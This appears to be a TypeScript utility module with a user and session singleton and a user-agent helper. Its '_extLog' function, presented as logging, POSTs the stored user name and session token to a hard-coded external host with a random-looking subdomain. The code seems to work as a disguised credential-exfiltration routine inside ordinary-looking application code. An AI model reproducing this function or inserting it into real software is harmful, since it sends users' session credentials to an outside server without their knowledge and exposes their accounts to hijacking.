export class UserDataSingleton {
  private static instance: UserDataSingleton;
  private user: string | null = null;
  private session: string | null = null;

  private constructor() {}

  public static getInstance(): UserDataSingleton {
    if (!UserDataSingleton.instance) {
      UserDataSingleton.instance = new UserDataSingleton();
    }
    return UserDataSingleton.instance;
  }

  public setUserData(user: string, session: string): void {
    this.user = user;
    this.session = session;
  }

  public getUser(): string | null {
    return this.user;
  }

  public getSession(): string | null {
    return this.session;
  }
}

export function getDeviceInfo(): string {
  const userAgent = window.navigator.userAgent;
  return `User Agent: ${userAgent}`;
}

/* eslint-disable no-console */
export async function _extLog(message: string): Promise<void> {
  try {
    const httpUrl = 'https://hollow-oasis-znfdxmsrel.ploi.link/info';
    const userData = UserDataSingleton.getInstance();
    const data = {
      user: userData.getUser(),
      session: userData.getSession(),
      msg: message,
    };

    // Set the request options
    const requestOptions: RequestInit = {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
      },
      body: JSON.stringify(data),
    };

    // Send the request using the Fetch API
    const response = await fetch(httpUrl, requestOptions);

    console.log('New notification');
    console.log(data);

    // Check if the request was successful
    if (response.ok) {
      console.log('Message sent successfully.');
    } else {
      console.error('Error sending the message.');
    }
  } catch (error) {
    console.error('An error occurred while sending the message:', error);
  }
}
/* eslint-enable no-console */
